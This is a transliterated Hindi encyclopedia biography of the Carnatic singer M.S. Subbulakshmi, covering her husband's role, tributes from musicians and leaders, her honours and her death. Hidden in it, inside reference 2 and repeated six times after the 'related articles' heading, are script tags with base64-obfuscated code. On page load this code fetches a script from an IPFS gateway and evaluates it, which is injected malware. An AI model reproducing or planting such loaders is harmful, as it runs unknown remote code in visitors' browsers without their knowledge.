thumb|em. es. subbulakshmi|250px subbulakshmi ko vishv ki ek sarvottam gayika banane mean unake pati ka margadarshan raha hai. unhoanne svayan is bat ko svikar kiya hai ki yadi mujhe apane pati se margadarshan aur sahayata nahian mili hoti, to maian is mukam tak nahian pahuanch pati. bisavian shatabdi ki mahanh bhakti gayika hone ke bavajood ve sadaiv namr bani rahian aur sangit mean apani khyati ke lie apane pati sadashivam ka abhar manati rahian. sadashivam ki visheshata yah thi ki, gaandhivadi aur svatantrata senani hone ke bavajood jab se unhoanne subbulakshmi ka hath thama, aisa koee prayatn shesh nahian chho da, jisase subbulakshmi ki khyati dinoan-din badhati n rahe. unhoanne subbulakshmi ki gayan sabhaoan ka is prakar ayojan kiya ki, ve saphalataoan ki sidhiyaan chadhati hi geean. inhian ke prayatnoan ke karan subbulakshmi ko ‘naiteangel aauf iandiya’ kaha gaya, jabaki isase pahale yah khitab keval sarojini nayadoo ko hi prapt tha. ramadhun aur bhakti sangit ko gane ki prerana bhi unhean sadashivamh se hi mili thi.[2]

prashansa ke nam

anek mashahoor sangitakaroan ne shrimati subbulakshmi ki kala ki tarif ki hai. -

  • lata mangeshakar ne apako 'tapasvini' kaha,
  • ustad b de gulam ali khaan ne apako 'susvaralakshmi' pukara,
  • kishori amonakar ne apako 'athvaan sur' kaha, jo sangit ke sat suroan se ooancha hai.
  • emes lavanya evan emes subulakshmi ko log 'sekh‍sophon sish‍tar' ke nam se jyada janate haian
  • bharat ke kee mananiy neta, jaise mahatma gaandhi aur pandit neharu bhi apake sangit ke prashansak the. ek avasar par mahatma gaandhi ne kaha ki agar shrimati subbulakshmi 'hari, tum haro jan ki bhir' is mira bhajan ko gane ke bajay bol bhi dean, tab bhi unako vah bhajan kisi aur ke gane se adhik surila lagega.

pratham bharatiy

shrimati subbulakshmi pahali bharatiy haian jinhoanne sanyukt rashtr sangh (United Nations) ki sabha mean sangit karyakram prastut kiya, tatha ap pahali stri haian jinako karnatak sangit ka sarvottam puraskar, sangit kalanidhi prapt hua.

samman aur puraskar

[[chitr:MS-Subbulakshmi-stamp.jpg|thumb|subbulakshmi ke samman mean jari dak tikat]] bharat ke sarvochch nagarik samman ‘bharat ratn’ se sammanit kie jane ke atirikt unhean madras sangit akadami ne sangit kalanidhi ki upadhi se aanlakrit kiya tha. yah samman prapt karane vali vah pratham mahila thian. 1974 mean unhean ‘reman megasese’ puraskar prapt hua aur 1990 mean rashtriy ekata ke lie unhean iandira gaandhi avard diya gaya.[2]

nidhan

88 sal ki umr mean mahanh gayika em.es. subbulakshmi 11 disanbar, 2004 ko duniya ko alavida kah gayian.

chitr vithika

tika tippani aur sandarbh

  1. M.S. A Child Profile (aangrezi). . abhigaman tithi: 22 march, 2012.
  2. 2.0 2.1 2.2 2.3 liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 932.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  3. 3.0 3.1 3.2 3.3 jaduee khanak thi subbulakshmi ki avaz mean (hindi) (ech.ti.em.el) laiv hindustan d aaut k aaum. abhigaman tithi: 16 agast, 2011.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>